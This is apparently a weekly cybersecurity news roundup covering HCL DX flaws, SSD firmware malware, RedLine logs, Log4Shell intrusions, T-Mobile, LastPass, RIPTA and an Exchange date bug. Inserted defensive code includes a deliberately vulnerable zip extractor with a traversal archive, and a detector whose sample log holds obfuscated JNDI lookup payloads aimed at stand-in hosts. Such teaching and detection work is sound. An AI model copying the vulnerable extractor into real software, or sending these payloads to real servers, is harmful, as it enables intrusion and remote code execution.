There’s no way to sugarcoat it; cybercrime is only worsening as we get more connected to the internet. Ransomware had a big year in 2021, and it’s virtually guaranteed that 2022 will surpass it. This year, defenders will not only need to pay closer attention to the attack vectors they’re presently monitoring, but they’ll also need to broaden their scope to include new targets.
This article rounds up the most significant information security and cybersecurity news of the past week.
- HCL Technologies patches HCL DX vulnerabilities
A few months ago, researchers found that HCL Digital Experience (DX), a platform for building and administering web portals, contains several vulnerabilities that could lead to remote code execution (RCE).
According to a blog post published on December 26 by Australian attack surface management firm Assetnote, the vendor, HCL Technologies, initially indicated that it could not reproduce the problems, which were all server-side request forgery (SSRF) flaws.
On December 30, five days after Assetnote’s disclosure, HCL Software, a division of HCL Technologies, issued a security advisory with fixes for an SSRF bug credited to Assetnote’s Shah and a related inefficient regular expression (ReDoS) vulnerability. Assetnote’s write-up notes that an attacker could use the SSRF to pivot into the internal network and reach cloud metadata endpoints to obtain cloud credentials.
Shah also reported that unauthenticated attackers could achieve command execution by submitting a malicious zip file: when the archive is unpacked, member names are not sanitised, so a directory traversal entry becomes an arbitrary file write.
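The following is an added example, not code from the article or from HCL or Assetnote, of the extraction bug class Shah describes: an archive whose member name contains `../` is written outside the intended directory by a naive extractor, while a checked extractor resolves every member path first and refuses the whole archive before writing anything. The archives, their contents and the directory layout are constructed for the example.

```python
import io
import os
import zipfile


def build_archive(members):
    """Build an in-memory zip from {member_name: content}. Constructed input:
    zipfile does not sanitise names on write, so '../' entries are stored as-is."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed archives: a benign theme upload, and one carrying a traversal
# entry (placeholder content; a real payload would be a server-side script).
BENIGN_ZIP = build_archive({"theme/index.html": "<h1>hello</h1>"})
MALICIOUS_ZIP = build_archive({
    "theme/index.html": "<h1>hello</h1>",
    "../../escaped.txt": "placeholder written outside the upload directory",
})


def naive_extract(zip_bytes, dest_dir):
    """The vulnerable pattern: trust the member name and join it to dest_dir.
    Returns the absolute paths actually written."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = os.path.join(dest_dir, info.filename)  # BUG: '../' escapes dest_dir
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.realpath(path))
    return written


def safe_extract(zip_bytes, dest_dir):
    """Hardened form: validate every member before writing anything; reject
    absolute names and any path that resolves outside dest_dir."""
    root = os.path.realpath(dest_dir)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if os.path.isabs(name) or name.startswith(("/", "\\")):
                raise ValueError(f"absolute path in archive member {name!r}")
            target = os.path.realpath(os.path.join(root, name))
            # commonpath (not startswith) so a sibling like root + '2' is rejected too
            if os.path.commonpath([root, target]) != root:
                raise ValueError(f"path traversal in archive member {name!r}")
        for info in zf.infolist():
            if info.is_dir():
                continue
            target = os.path.realpath(os.path.join(root, info.filename))
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(target)
    return written


def escaped_paths(paths, dest_dir):
    """Paths from an extraction that landed outside dest_dir."""
    root = os.path.realpath(dest_dir)
    return [p for p in paths if os.path.commonpath([root, p]) != root]
```

Validating all members before writing any matters: an extractor that checks as it goes still leaves the benign members of a malicious archive on disk when it aborts, which is itself a foothold if those members are server-side scripts.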
Mitigation
Where patches cannot be applied, Shah cautions that WAF rules cannot be relied on to block exploitation. Instead, he recommends that customers modify every proxy-config.xml file in their WebSphere Portal installation so that no origins are allowed, and remove the several directories listed in the blog post if their functionality is no longer required.
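As an added example, not part of the article and not HCL's proxy-config.xml implementation, here is what the "allow no origins" mitigation and the metadata pivot described above look like in code: an outbound-proxy check that denies everything unless the target origin is allow-listed, and still refuses an allow-listed host if any address it resolves to is loopback, private, link-local or a cloud-metadata endpoint. The DNS table, hostnames and the 1.2.3.4 stand-in public address are constructed so the example runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed DNS table standing in for the resolver. "rebind.attacker.example"
# models a name whose records mix a public and a metadata address (the
# DNS-rebinding style bypass); 1.2.3.4 is a stand-in public IP.
FAKE_DNS = {
    "cdn.example.com": ["1.2.3.4"],
    "intranet.example.internal": ["10.0.0.5"],
    "metadata.google.internal": ["169.254.169.254"],
    "rebind.attacker.example": ["1.2.3.4", "169.254.169.254"],
}

# Metadata endpoints an SSRF pivot typically aims at: the IMDS address shared
# by AWS, Azure and GCP, and the AWS IPv6 IMDS address.
METADATA_ADDRESSES = {
    ipaddress.ip_address("169.254.169.254"),
    ipaddress.ip_address("fd00:ec2::254"),
}


def resolve(host):
    """Return every address for host: an IP literal resolves to itself,
    anything else is looked up in the constructed table (empty = NXDOMAIN)."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return FAKE_DNS.get(host.lower(), [])


def is_forbidden_address(addr):
    """True for any address a portal proxy must never fetch from: loopback,
    RFC 1918 / ULA, link-local (where IMDS lives), reserved, multicast and
    the explicit metadata endpoints. IPv4-mapped IPv6 literals such as
    ::ffff:169.254.169.254 are unwrapped first so they cannot slip past."""
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (
        ip in METADATA_ADDRESSES
        or ip.is_loopback
        or ip.is_private
        or ip.is_link_local
        or ip.is_reserved
        or ip.is_multicast
        or ip.is_unspecified
    )


def check_proxy_target(url, allowed_origins=frozenset()):
    """Decide whether the portal's outbound proxy may fetch url.
    Deny by default: with the empty allow-list (the "allow no origins"
    setting from the mitigation) nothing passes. Even an allow-listed origin
    is refused if any address it resolves to is forbidden.
    Returns (allowed, reason)."""
    try:
        parts = urlsplit(url)
        host, port = parts.hostname, parts.port
    except ValueError as exc:
        return False, f"malformed URL: {exc}"
    if parts.scheme not in ("http", "https") or not host:
        return False, "unsupported scheme or missing host"
    origin = f"{parts.scheme}://{host}" + (f":{port}" if port else "")
    if origin not in allowed_origins:
        return False, f"origin {origin} is not allow-listed"
    addresses = resolve(host)
    if not addresses:
        return False, f"{host} did not resolve"
    for addr in addresses:
        if is_forbidden_address(addr):
            return False, f"{host} resolves to forbidden address {addr}"
    return True, f"{origin} permitted"
```

In a real deployment the resolved addresses must also be the ones actually connected to (pin the socket to the checked address), otherwise a second lookup at connect time reopens the rebinding gap the `rebind.attacker.example` entry illustrates.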
- SSDs at risk of firmware-level malware attack
Researchers in Korea have devised a set of attacks against solid-state drives (SSDs) that would let malware be planted in a location beyond the reach of the user and of security software. According to a Bleeping Computer report on December 30, the attack models target drives with flex-capacity features, specifically a hidden region of the device known as over-provisioning (OP), which SSD manufacturers commonly use to boost the performance of NAND flash storage.
How flexible capacity works
Micron Technology’s Flex Capacity feature lets a drive adjust the split between raw and user-allocated space automatically as it absorbs write workloads, trading capacity for performance. Over-provisioning is a dynamic mechanism that creates and resizes a buffer space, typically occupying 7% to 25% of the drive’s total capacity.
The operating system and everything running on it, including security and antivirus software, cannot see the over-provisioning region. The SSD’s controller firmware resizes this space dynamically as the user runs different applications, depending on how write-intensive or read-intensive they are.
Countermeasures
Against the first attack model, which recovers data left behind in the OP area, the researchers advise that SSD makers clear the OP area with a pseudo-erase method that does not affect real-time performance.
Against the second attack model, planting malware in the OP area, a monitoring system that tracks the ratio of valid to invalid data inside the SSD in real time could be an effective countermeasure. If the invalid data ratio suddenly climbs significantly, the user could receive a warning and the option of running a verifiable data-wiping routine on the OP area.
Finally, access to the SSD management application should be strongly protected against unauthorised use.
- 441K accounts stolen by RedLine malware now searchable at Have I Been Pwned
The data breach notification service Have I Been Pwned now lets you check whether your email address and password were among the 441,000 accounts stolen in a RedLine malware campaign.
According to a Bleeping Computer report on December 30, RedLine is currently the most widely used information-stealing malware, distributed mainly through phishing campaigns. Once installed, RedLine attempts to steal cookies, credentials, credit card numbers and autocomplete data from browsers. It can also download additional payloads or execute commands on the infected system, steal credentials saved in VPN and FTP clients, and steal cryptocurrency wallets.
The stolen data is bundled into a “log” and sent to a remote server, from which the attacker can retrieve it at any time. Attackers use these logs to compromise further accounts or sell them on dark web marketplaces for as little as $5 per login. A set of RedLine logs has now been made public.
Have I Been Pwned can now search the RedLine data, which contains 441,657 unique email addresses.
If your email address appears in the RedLine logs, changing the password on that email account alone is not enough. Because RedLine collects everything on the machine, you must change the passwords for every account used on that computer, including corporate VPN and email accounts as well as personal ones.
You should also run an antivirus scan on the computer to find and remove the malware.
- Chinese APT hackers targeted an academic institution with the Log4Shell exploit
According to CrowdStrike research published on December 29, a China-based hacking group known for industrial espionage and intelligence collection used a Log4j vulnerability to target a large academic institution.
Log4j is a widely used open-source logging library with millions of installations, which makes the full scope of potential victims hard to determine. When the vulnerability was disclosed in December, attackers rushed to exploit it, meaning that even organisations that patched promptly may already have had an attacker on their systems.
After gaining access through a modified Log4j exploit aimed at VMware Horizon, a virtual desktop platform, the group was observed attempting to deploy malware. It also attempted to harvest credentials for further exploitation.
The group, which CrowdStrike tracks as Aquatic Panda, a China-based targeted intrusion adversary, was seen leveraging critical vulnerabilities in the Apache Log4j logging library as an initial access vector for post-exploitation activity on the targeted systems, including reconnaissance and credential harvesting.
After CrowdStrike notified it, the victim organisation was able to apply its incident response process promptly, patch the vulnerable application and block further threat actor activity on the host. The attack’s specific objective remains unknown, but it was successfully disrupted.
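Because exploitation attempts like the one above arrive as `${jndi:...}` lookup strings in request headers or paths, the first thing most defenders did was grep their web logs for them, and attackers responded with nested lookups and URL encoding. The following is an added example, not CrowdStrike's or the article's code, of a detector that de-obfuscates the common `${lower:}`, `${upper:}` and `${...:-x}` nesting tricks before matching. The log lines are constructed for the example and use documentation IP ranges.

```python
import re
from urllib.parse import unquote

# Constructed web-server log lines (Apache combined format). Lines 1-4 carry a
# JNDI lookup in the User-Agent or the request path in plain, nested-lookup,
# URL-encoded and default-value-obfuscated forms; lines 5-6 are benign.
SAMPLE_LOG = r'''
203.0.113.5 - - [30/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.5 - - [30/Dec/2021:10:00:02 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://198.51.100.7/b} HTTP/1.1" 200 512 "-" "curl/7.79"
203.0.113.6 - - [30/Dec/2021:10:00:03 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"
203.0.113.6 - - [30/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7/d}"
198.51.100.9 - - [30/Dec/2021:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
198.51.100.9 - - [30/Dec/2021:10:00:06 +0000] "GET /search?q=${price} HTTP/1.1" 200 300 "-" "Mozilla/5.0"
'''.strip().splitlines()

INNERMOST = re.compile(r"\$\{([^${}]*)\}")            # a lookup with no lookup inside it
JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)


def _resolve_lookup(expr):
    """Emulate the Log4j lookups attackers use to hide 'jndi': ${lower:X},
    ${upper:X} and the default-value form ${anything:-X} (e.g. ${::-j}).
    Returns None for lookups we deliberately leave alone (e.g. ${jndi:...})."""
    key, sep, rest = expr.partition(":")
    if not sep:
        return None
    if key.lower() == "lower":
        return rest.lower()
    if key.lower() == "upper":
        return rest.upper()
    if ":-" in expr:
        return expr.split(":-", 1)[1]
    return None


def normalise(text, max_rounds=16):
    """URL-decode (twice, for double-encoded probes), then collapse nested
    lookups from the inside out until nothing changes. The round limit keeps a
    pathological input from looping."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        changed = False

        def collapse(match):
            nonlocal changed
            resolved = _resolve_lookup(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNERMOST.sub(collapse, text)
        if not changed:
            break
    return text


def find_jndi(lines):
    """Return (1-based line number, normalised lookup) for every line that
    contains a JNDI lookup once de-obfuscated."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for match in JNDI.finditer(normalise(line)):
            hits.append((number, match.group(0)))
    return hits


if __name__ == "__main__":
    for number, lookup in find_jndi(SAMPLE_LOG):
        print(f"line {number}: {lookup}")
```

Matching on the normalised string rather than on the raw line is what catches lines 2 and 4; a plain `jndi:` grep sees neither.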
- Customer information and SIM cards compromised in another T-Mobile incident
T-Mobile has been hit by another cyberattack, following its significant data breach in August. According to a report by The Verge on December 28, attackers this time gained access to a small number of customers’ accounts.
Affected customers were either victims of a SIM-swapping attack (which can let an attacker bypass SMS-based two-factor authentication), had personal plan information exposed, or both. The exposed customer proprietary network information included the billing account name, phone and account numbers, and plan details such as how many lines were tied to the account.
In August, the carrier disclosed a data breach that exposed the personal information of about 50 million customers, including Social Security numbers, names and dates of birth. The data exposed in the December incident appears less sensitive and far less extensive, and the notification letters state that customers whose SIMs were swapped have regained access to their accounts. The Verge said it could find few customers reporting that they had received notification letters.
T-Mobile’s support account on Twitter appears to have confirmed the incident, telling users that it is taking immediate action to help anyone affected.
- LastPass allays fears of a cyber-attack by blaming an email notification spike on a “glitch.”
Following a recent spike in blocked login attempts, LastPass has initiated an investigation.
Login attempts from a different browser version, device or location normally trigger a notification to the user’s registered email address. The email directs the user to a URL where they can confirm whether the attempt was legitimate.
When LastPass noticed an unexpected surge in the volume of blocked-login emails, it investigated, initially assuming a credential stuffing attack. Credential stuffing relies on the common but insecure habit of reusing the same username and password across many websites: credentials leaked from one site are replayed in bulk against another.
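What makes credential stuffing recognisable in authentication logs is its shape: one source trying many different accounts, roughly once each, with a high failure rate, as opposed to a brute-force attack that hammers one account. The following is an added example, not LastPass's or The Daily Swig's code, of a classifier that separates those two shapes from ordinary traffic over constructed login events. The log format, thresholds, IP addresses and usernames are all assumptions made for the example.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class LoginEvent:
    ts: datetime
    ip: str
    user: str
    success: bool


def _constructed_sample():
    """Constructed 'ISO-timestamp ip user OK|FAIL' lines: a stuffing source
    replaying a leaked list, a brute-force source, and an office NAT."""
    base = datetime(2021, 12, 28, 9, 0, 0)
    lines = []
    for i in range(12):  # 12 different users, once each, one of them hits
        outcome = "OK" if i == 7 else "FAIL"
        lines.append(f"{(base + timedelta(seconds=3 * i)).isoformat()} 203.0.113.10 user{i:02d}@example.com {outcome}")
    for i in range(8):   # one account, eight failures: brute force, not stuffing
        lines.append(f"{(base + timedelta(seconds=5 * i)).isoformat()} 198.51.100.20 alice@example.com FAIL")
    lines.append(f"{(base + timedelta(minutes=1)).isoformat()} 192.0.2.30 bob@example.com OK")
    lines.append(f"{(base + timedelta(minutes=2)).isoformat()} 192.0.2.30 carol@example.com OK")
    return lines


SAMPLE_LOG = _constructed_sample()


def parse_events(lines):
    events = []
    for line in lines:
        ts, ip, user, outcome = line.split()
        events.append(LoginEvent(datetime.fromisoformat(ts), ip, user, outcome == "OK"))
    return events


def classify_sources(events, window_minutes=10, min_users=10,
                     max_attempts_per_user=2.0, min_fail_ratio=0.8, brute_force_fails=5):
    """Bucket events per (source IP, fixed window) and label each bucket.
    Stuffing: many distinct users, few attempts per user, mostly failures.
    Brute force: a single user with many failures. Everything else: normal."""
    buckets = defaultdict(list)
    for ev in events:
        start = ev.ts.replace(minute=ev.ts.minute - ev.ts.minute % window_minutes,
                              second=0, microsecond=0)
        buckets[(ev.ip, start)].append(ev)
    findings = []
    for (ip, start), evs in sorted(buckets.items()):
        users = {e.user for e in evs}
        attempts, fails = len(evs), sum(not e.success for e in evs)
        if (len(users) >= min_users and attempts / len(users) <= max_attempts_per_user
                and fails / attempts >= min_fail_ratio):
            verdict = "credential-stuffing"
        elif len(users) == 1 and fails >= brute_force_fails:
            verdict = "brute-force"
        else:
            verdict = "normal"
        findings.append({
            "ip": ip, "window_start": start, "attempts": attempts,
            "distinct_users": len(users), "failures": fails, "verdict": verdict,
            # accounts the stuffing source got into: these need a forced reset
            "compromised": sorted(e.user for e in evs if e.success) if verdict == "credential-stuffing" else [],
        })
    return findings


def verdict_by_ip(findings):
    """Worst verdict seen for each IP across all windows."""
    rank = {"normal": 0, "brute-force": 1, "credential-stuffing": 2}
    worst = {}
    for f in findings:
        if f["ip"] not in worst or rank[f["verdict"]] > rank[worst[f["ip"]]]:
            worst[f["ip"]] = f["verdict"]
    return worst
```

The successes inside a stuffing bucket are the actionable output: those are the reused passwords that worked, and the accounts that need a forced reset and a review of recent activity, which is exactly the question LastPass had to answer about its own alert spike.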
In a statement reported by The Daily Swig, LastPass said its initial investigation found no evidence that any LastPass accounts had been compromised by an unauthorised third party as a result of the credential stuffing attempts, nor that any user’s LastPass credentials had been stolen by malware, rogue browser extensions or phishing.
The cloud-based password manager subsequently attributed the rise in blocked-login email alerts to a technical issue rather than to malicious activity.
- RIPTA data breach exposes PII of an undetermined number of people
The Rhode Island Public Transit Authority (RIPTA) disclosed a data breach on December 29 that exposed names, Social Security numbers, addresses, dates of birth, Medicare information, health insurance member ID numbers and claims information; the number of people affected is disputed.
The affected people who were not RIPTA employees all said they had worked for the state at some point. The US Department of Health and Human Services breach portal lists nearly 5,000 people affected, whereas RIPTA’s notification letter to an affected individual put the number at 17,378.
- Microsoft releases fix for Exchange Y2K22 bug that disrupted email delivery
On January 2, 2022, Microsoft released a fix for a problem that caused email messages to become stuck on Exchange Server around the turn of the year, which it attributed to a date validation problem.
The problem affected on-premises Exchange Server 2016 and Exchange Server 2019, although Microsoft did not say how widespread it was. As 2022 arrived, affected servers stopped delivering mail and logged an error. The trigger was the version number of a signature file used by Exchange’s malware scanning engine: the version is date-based, and the first 2022 value, 2201010001, exceeds the maximum of a signed 32-bit integer (2,147,483,647), so the engine failed to load it.
To fix the issue, Microsoft advises customers to download Reset-ScanEngineVersion.ps1, a PowerShell script that resets the scan engine and must be run on every Exchange mailbox server that downloads antimalware updates. The update also moves the engine’s version number to 2112330001, which still fits within that range.
Microsoft says the updated scanning engine is fully supported. Rather than rolling the engine version back, it rolled the version forward into this new sequence, which will continue to receive updates while Microsoft works on a long-term fix.
Sources
https://portswigger.net/daily-swig/hcl-technologies-patches-serious-vulnerabilities-in-hcl-dx
https://thehackernews.com/2021/12/chinese-apt-hackers-used-log4shell.html
https://www.securitymagazine.com/articles/96814-ripta-data-breach-compromises-unexplained-pii
https://thehackernews.com/2022/01/microsoft-issues-fix-for-exchange-y2k22.html
The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.